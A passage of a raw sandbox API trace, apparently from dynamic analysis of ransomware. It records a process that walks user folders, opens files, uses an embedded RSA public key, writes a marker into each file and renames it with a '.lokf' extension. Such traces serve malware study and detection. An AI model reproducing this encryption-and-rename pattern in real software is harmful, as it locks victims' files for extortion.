Size=0xa6) returned 0x3201e90 [0059.817] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned=".url" [0059.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.818] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.818] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.821] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.821] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.821] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.821] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.822] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.822] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.822] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.822] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.822] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.822] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.822] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.822] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.822] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.822] GetLastError () returned 0x0 [0059.822] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.822] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.823] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.823] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.823] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.823] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.823] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.823] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.823] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.823] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.823] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.823] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.823] CloseHandle (hObject=0x5cc) returned 1 [0059.824] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0059.824] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0059.824] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.lokf")) returned 1 [0059.825] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0059.825] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.825] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.825] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269928 | out: hHeap=0x660000) returned 1 [0059.825] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.825] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0059.825] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.825] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.825] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.825] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.829] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.829] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.829] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.829] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.829] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\") returned="eIv9rDB\\" [0059.829] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0059.829] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.829] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.829] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.829] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.829] PathFindFileNameW (pszPath="") returned="" [0059.829] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f5fb960, ftCreationTime.dwHighDateTime=0x1d4d2cd, ftLastAccessTime.dwLowDateTime=0x6871d5a0, ftLastAccessTime.dwHighDateTime=0x1d4d342, ftLastWriteTime.dwLowDateTime=0x6871d5a0, ftLastWriteTime.dwHighDateTime=0x1d4d342, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.829] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.829] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f5fb960, ftCreationTime.dwHighDateTime=0x1d4d2cd, ftLastAccessTime.dwLowDateTime=0x6871d5a0, ftLastAccessTime.dwHighDateTime=0x1d4d342, ftLastWriteTime.dwLowDateTime=0x6871d5a0, ftLastWriteTime.dwHighDateTime=0x1d4d342, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.829] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75906a80, ftCreationTime.dwHighDateTime=0x1d4d3bf, ftLastAccessTime.dwLowDateTime=0xd19d26b0, ftLastAccessTime.dwHighDateTime=0x1d4ce5b, ftLastWriteTime.dwLowDateTime=0xd19d26b0, ftLastWriteTime.dwHighDateTime=0x1d4ce5b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-Y1PqBS8_MAyXOFE", cAlternateFileName="-Y1PQB~1")) returned 1 [0059.829] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x478db0f0, ftCreationTime.dwHighDateTime=0x1d4c7a0, ftLastAccessTime.dwLowDateTime=0xd9308810, ftLastAccessTime.dwHighDateTime=0x1d4ce7c, ftLastWriteTime.dwLowDateTime=0xd9308810, ftLastWriteTime.dwHighDateTime=0x1d4ce7c, nFileSizeHigh=0x0, nFileSizeLow=0xc8d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2RGMtQTERV.mp3", cAlternateFileName="2RGMTQ~1.MP3")) returned 1 [0059.829] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\2RGMtQTERV.mp3") returned=".mp3" [0059.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\2RGMtQTERV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\2rgmtqterv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.829] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=51412) returned 1 [0059.829] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.832] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc8ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.832] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.833] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xc8d4, lpOverlapped=0x0) returned 1 [0059.833] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.833] lstrlenA (lpString="-----BEGIN PUBLIC 